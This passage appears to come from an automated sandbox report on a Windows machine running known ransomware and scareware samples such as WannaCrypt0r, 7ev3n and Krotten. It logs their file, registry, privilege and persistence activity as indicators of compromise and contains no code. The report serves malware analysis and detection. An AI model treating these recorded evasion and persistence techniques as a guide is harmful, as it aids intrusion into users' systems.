C:\Windows\SystemApps\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Assets\PeopleLogo.targetsize-32_altform-unplated_contrast-white.png wizard.exe File opened for modification C:\Windows\SystemResources\Windows.UI.ShellCommon\Images\CellularToast.scale-125_contrast-black.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-c..er.appxmain.ratings_31bf3856ad364e35_10.0.19041.1_none_ff46bbc9afee54c5\RatingStars48.contrast-white_scale-200.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-ecapp.appxmain_31bf3856ad364e35_10.0.19041.746_none_db09942beaf4fdfa\Splashscreen.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.19041.1202_none_8f7e37524c3e1a13\TileSmall.contrast-white_scale-400.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.19041.1_none_d0af17ec366548f3\TileSmall.contrast-white_scale-150.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.1_none_75cd350cc8b5dbcf\columnmove.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-microsoftedge_31bf3856ad364e35_10.0.19041.264_none_ef195f564f00d259\MicrosoftEdgeSquare150x150.scale-200.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-microsoftedge_31bf3856ad364e35_10.0.19041.264_none_ef195f564f00d259\MicrosoftEdgeSquare310x310.scale-400_contrast-white.png wizard.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Assets\square44x44logo.scale-100_contrast-black.png wizard.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Ratings\RatingStars45.scale-200.png wizard.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy\Assets\SquareTile44x44.scale-400.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-fileexplorer.appxmain_31bf3856ad364e35_10.0.19041.546_none_476476bb5c3a0bbc\PPIRemovableStorageDevicesSquareTile44x44.scale-100.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.423_none_bfcb7b02f95b1e52\PeopleLogo.targetsize-20_altform-unplated.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-t..honyinteractiveuser_31bf3856ad364e35_10.0.19041.264_none_a61d15efb6291d40\AnswerWithVideo.scale-150.png wizard.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\contrast-white\SmallTile.scale-400.png wizard.exe File opened for modification C:\Windows\SystemResources\Windows.UI.Search\Images\logo.scale-80.png wizard.exe File opened for modification C:\Windows\SystemResources\Windows.UI.Shell\Images\Icon_MMXresume.contrast-white_scale-400.png wizard.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1144 5612 WerFault.exe 234 -
System Location Discovery: System Language Discovery 1 TTPs 51 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wizard.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhsvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ielowutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rhc3stj0e147.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language is-5VN37.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "950713629" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "430417534" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000074472bebe7af3a46942426e1e277b42a00000000020000000000106600000001000020000000de694a1ec16cb98b873657e3f00515d23c4bb45f2aaa33485415ecc1c75718e1000000000e800000000200002000000091c652fcf319e68cac770cf656df57c6bb394f5fff0b3006b413cd0ba7633d1420000000ef2f5d1db1db1624d053dd4958698cdfdc7fdb2f276c60bfda21593fb62ee1dd40000000ab1306976705c982ee40fb46044bdfd227b32c32f97a8838f19b38c37cc97f533354b7466c8f3cb1a67982a0774e4d6e9f8d89fc83958399271cb1a97e1690b4 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "949995357" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000074472bebe7af3a46942426e1e277b42a0000000002000000000010660000000100002000000036fc0ab9544d2ba7e6adc212a7e8ecde9ceb23fa9e98dfac4536145858d3786b000000000e80000000020000200000005d78e37273cf2cf11aa71ac92aad0359c2ed973c543f50078f00d9a2f40d6d17200000006890a695e170fad443f279e15d222f4a2683d64dcbc9840863d8ca2e7affdce840000000b2e6806224609a59c632310838795a134f8e45d74de4d4800703395b4447ee855112d246c2e4fe7696f2ad23f23984b09e5404ff21a72c6d32e8e9145b093441 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "950076517" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31125094" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 506a0a6466eeda01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31125094" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "950713629" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000074472bebe7af3a46942426e1e277b42a0000000002000000000010660000000100002000000088703ea904b59dca06d46a8b5f1656ee10fef91b03612b287cce597563c3c141000000000e8000000002000020000000adeec12b5e768c5cf3412db7a56add135dfb4825e0d5514075566c70745c8afb20000000e719f9fd1f9e228bbc16d11e41a0dcb39fe9115721da213183a249647d23521440000000d218521ab3501568352f1487754614d2bfcc599e80b046e2a529a61b4b95105be6e79c4488629159ef8de58e6c1159be35ba3c9deffe47f0a5f77c86e208150e iexplore.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0bfdd6466eeda01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000074472bebe7af3a46942426e1e277b42a000000000200000000001066000000010000200000007c3b7f3e1f1285e95a197116c7340f0868b82aaa27d509be8f79aef8e9de7b0c000000000e80000000020000200000007777a42b842db325bbe5ee7ece03ca60a04375fa23b5cc58352ed05f2a0bd21720000000a82ef2d155f339ef1ec2dbabecc0ffd86f2dded5fd14064a67331b075827f75d4000000074171774d528dbdb72e81140769d686ae55d535ac4f3e7983473d1c852bf59d8ff8b7c92c91dcabf8c8351770ae4dd2022bddcd284ceb163c1d7652b49558f34 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30425f3966eeda01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31125094" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31125094" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{640CB116-5A59-11EF-9912-4A4A300BA5D9} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20b3993966eeda01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ wscript.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings firefox.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 5532 reg.exe -
NTFS ADS 10 IoCs
description ioc Process File created C:\Users\Admin\Downloads\=D.zip:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\InternetSecurityGuard.zip:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\XP Antivirus 2008.zip:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\7ev3n.zip:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\XFC.zip:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Krotten.zip:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\WannaCrypt0r.zip:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\WannaCrypt0r(1).zip:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Winlocker.VB6.Blacksod.zip:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\Xyeta.zip:Zone.Identifier firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2536 SCHTASKS.exe -
Suspicious behavior: EnumeratesProcesses 32 IoCs
pid Process 1140 [email protected] 1140 [email protected] 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5516 taskhsvc.exe 5516 taskhsvc.exe 5516 taskhsvc.exe 5516 taskhsvc.exe 5516 taskhsvc.exe 5516 taskhsvc.exe 3008 msiexec.exe 3008 msiexec.exe 1600 msedge.exe 1600 msedge.exe 4356 msedge.exe 4356 msedge.exe 408 msedge.exe 408 msedge.exe 3380 msedge.exe 3380 msedge.exe 5532 identity_helper.exe 5532 identity_helper.exe 6712 mspaint.exe 6712 mspaint.exe 1160 mspaint.exe 1160 mspaint.exe 872 mspaint.exe 872 mspaint.exe 6684 mspaint.exe 6684 mspaint.exe 6856 mspaint.exe 6856 mspaint.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 5896 wizard.exe 5176 rhc3stj0e147.exe 2068 @[email protected] -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4908 firefox.exe Token: SeDebugPrivilege 4908 firefox.exe Token: SeDebugPrivilege 4908 firefox.exe Token: SeDebugPrivilege 4908 firefox.exe Token: SeDebugPrivilege 4908 firefox.exe Token: SeDebugPrivilege 4908 firefox.exe Token: SeDebugPrivilege 4908 firefox.exe Token: SeDebugPrivilege 4908 firefox.exe Token: SeDebugPrivilege 1140 [email protected] Token: SeDebugPrivilege 4908 firefox.exe Token: SeDebugPrivilege 4908 firefox.exe Token: SeDebugPrivilege 5176 rhc3stj0e147.exe Token: SeDebugPrivilege 4908 firefox.exe Token: SeDebugPrivilege 4908 firefox.exe Token: SeDebugPrivilege 4908 firefox.exe Token: SeDebugPrivilege 4908 firefox.exe Token: SeSecurityPrivilege 3008 msiexec.exe Token: SeCreateTokenPrivilege 5188 [email protected] Token: SeAssignPrimaryTokenPrivilege 5188 [email protected] Token: SeLockMemoryPrivilege 5188 [email protected] Token: SeIncreaseQuotaPrivilege 5188 [email protected] Token: SeMachineAccountPrivilege 5188 [email protected] Token: SeTcbPrivilege 5188 [email protected] Token: SeSecurityPrivilege 5188 [email protected] Token: SeTakeOwnershipPrivilege 5188 [email protected] Token: SeLoadDriverPrivilege 5188 [email protected] Token: SeSystemProfilePrivilege 5188 [email protected] Token: SeSystemtimePrivilege 5188 [email protected] Token: SeProfSingleProcessPrivilege 5188 [email protected] Token: SeIncBasePriorityPrivilege 5188 [email protected] Token: SeCreatePagefilePrivilege 5188 [email protected] Token: SeCreatePermanentPrivilege 5188 [email protected] Token: SeBackupPrivilege 5188 [email protected] Token: SeRestorePrivilege 5188 [email protected] Token: SeShutdownPrivilege 5188 [email protected] Token: SeDebugPrivilege 5188 [email protected] Token: SeAuditPrivilege 5188 [email protected] Token: SeSystemEnvironmentPrivilege 5188 [email protected] Token: SeChangeNotifyPrivilege 5188 [email protected] Token: SeRemoteShutdownPrivilege 5188 [email protected] Token: SeUndockPrivilege 5188 [email protected] Token: SeSyncAgentPrivilege 5188 [email protected] Token: SeEnableDelegationPrivilege 5188 [email protected] Token: SeManageVolumePrivilege 5188 [email protected] Token: SeImpersonatePrivilege 5188 [email protected] Token: SeCreateGlobalPrivilege 5188 [email protected] Token: SeShutdownPrivilege 5240 msiexec.exe Token: SeIncreaseQuotaPrivilege 5240 msiexec.exe Token: SeCreateTokenPrivilege 5240 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 5240 msiexec.exe Token: SeLockMemoryPrivilege 5240 msiexec.exe Token: SeIncreaseQuotaPrivilege 5240 msiexec.exe Token: SeMachineAccountPrivilege 5240 msiexec.exe Token: SeTcbPrivilege 5240 msiexec.exe Token: SeSecurityPrivilege 5240 msiexec.exe Token: SeTakeOwnershipPrivilege 5240 msiexec.exe Token: SeLoadDriverPrivilege 5240 msiexec.exe Token: SeSystemProfilePrivilege 5240 msiexec.exe Token: SeSystemtimePrivilege 5240 msiexec.exe Token: SeProfSingleProcessPrivilege 5240 msiexec.exe Token: SeIncBasePriorityPrivilege 5240 msiexec.exe Token: SeCreatePagefilePrivilege 5240 msiexec.exe Token: SeCreatePermanentPrivilege 5240 msiexec.exe Token: SeBackupPrivilege 5240 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 5896 wizard.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe -
Suspicious use of SendNotifyMessage 50 IoCs
pid Process 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 4908 firefox.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 3380 msedge.exe 5176 rhc3stj0e147.exe 5176 